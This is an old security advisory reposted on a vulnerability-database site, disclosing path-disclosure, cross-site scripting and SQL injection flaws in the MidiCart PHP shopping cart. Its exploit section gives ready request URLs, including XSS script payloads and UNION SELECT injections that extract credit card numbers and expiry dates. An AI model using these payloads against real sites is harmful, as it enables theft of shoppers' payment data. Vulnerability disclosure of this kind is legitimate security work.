Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Hackgen Security Advisory 2005.4

🗓️ 06 Aug 2005 00:00:00Reported by ExoduksType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 51 Views

Hackgen Security Advisory 2005.4 - Vulnerabilities in MidiCart PHP Shopping Car

Code
`  
  
http://www.hackgen.org/advisories/hackgen-2005-004.txt  
  
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''  
' [hackgen-2005-#004] '  
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''  
' Multiple bugs in MidiCart PHP Shopping Cart '  
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''  
  
Software: MidiCart PHP Shopping Cart  
Homepage: http://www.midicart.com/  
Author: "Exoduks" - HackGen Team  
Release Date: 5 May, 2005  
Website: www.hackgen.org  
Mail: exoduks [at] gmail . com  
  
  
  
0x01 - Affected software description:  
-------------------------------------  
MidiCart is a Try-Before-You-Buy Shopping Cart Software, that provides all you need to   
create, operate, and maintain a professional Internet shop. MidiCart ASP and PHP Shopping   
Cart is extremely easy to use, flexible, powerful and affordable e-commerce solution for   
your web site.   
  
  
  
0x02 - Vulnerability Discription:  
---------------------------------  
There are several vulnarabilities in midicart. First there are some full-path disclosure  
bugs because of some undefined variable and if php.ini is set to display_errors = on we   
will see full path of the script. Second vulnerability is xss in item_list.php and   
search_list.php file which doesn't have any checking of input string so it is possible to   
inject some evil code and execute through the browser. Third bug is a sql injection also   
in search_list.php, item_list.php and item_show.php file also because there isn't any   
filtering and checking of input string which will be executed in mysql command so with   
special crafted sql command we can get some sensitve information from database.  
  
  
  
0x03 - Vulnerability Code:  
--------------------------  
Code vulnarable to sql injectio in search_list.php file  
...  
// database query to select the categories  
$result = mysql_query("select * from products WHERE $chose LIKE '%$searchstring%' ORDER BY   
'maingroup','secondgroup','code_no' LIMIT 0, 100 ") ;  
...  
  
Code vulnarable to sql injectio in item_show.php file  
// query to get the products of type $category  
$result = mysql_query("select * from products where(code_no = '$code_no') ORDER BY 'item'");  
  
  
0x04 - How to fix this bug:  
---------------------------  
Vendor has beed contacted and he we probably publish new version of this shopping cart so go to   
http://www.midicart.com/ and look for new version.  
  
  
0x05 - Exploit:  
----------------  
  
Full-path disclosure !  
-----------------------  
http://site.com/shop/search_list.php  
http://site.com/shop/item_list.php  
http://site.com/shop/item_show.php  
  
XSS !  
------  
http://site.com/shop/search_list.php?chose=item&searchstring=%3Cscri pt%3Ealert('Lamed%20!');%3C/script%3E  
http://site.com/shop/item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E  
http://site.com/shop/item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E  
  
SQL injection !  
----------------  
http://site.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard,   
ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,   
null, null, null, null, null, null, null, null FROM card_payment /*  
  
http://site.com/shop/item_list.php?maingroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null,   
null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,   
null, null, null, null, null, null FROM card_payment /*  
  
http://site.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null,   
null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,   
null, null, null, null, null, null FROM card_payment /*  
  
http://site.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, CreditCard, ExpDate,null,   
null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,   
null, null, null, null, null, null FROM card_payment /*   
  
* works with magic_quotes_gpc set to Off in php.ini file   
  
  
  
0x006 - The End:  
----------------  
And we are at the end again. Grejtttzz to blackhat.headcoders.net  
  
______________________________________  
Written By Exoduks - www.hackgen.org  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Aug 2005 00:00Current
0.6Low risk
Vulners AI Score0.6
vulnerabilitiesmidicart phpshopping cartxsssql injectionfull-path disclosuresecurity advisoryhackgen team
51